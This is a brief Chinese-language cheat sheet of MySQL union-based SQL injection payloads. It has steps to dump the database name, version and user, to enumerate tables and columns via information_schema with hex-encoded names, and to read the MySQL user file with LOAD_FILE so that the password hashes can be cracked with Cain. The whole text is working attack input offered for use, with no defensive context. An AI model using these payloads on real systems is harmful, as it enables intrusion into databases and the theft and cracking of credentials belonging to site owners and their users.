一.查看MYSQL基本信息(库名,版本,用户)
and 1=2 union select
1,2,3,database(),5,version(),6,user(),7..../*
二.暴表
and 1=2 union select 1,2,3,TABLE_NAME,4,5,6,7...... from
information_schema.TABLES where TABLE_SCHEMA =库的HEX limit 1,1/*
三.暴字段
and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7.....from
information_schema.COLUMNS where TABLE_NAME=表的HEX limit 1,1/*
关于找不到ROOT密码的爆破:
通过LOAD_FILE(‘‘C:\..\MYSQL\DATA\MYSQL\USER.MYD‘‘)得到用户的HASH散列,之后用CAIN爆破....
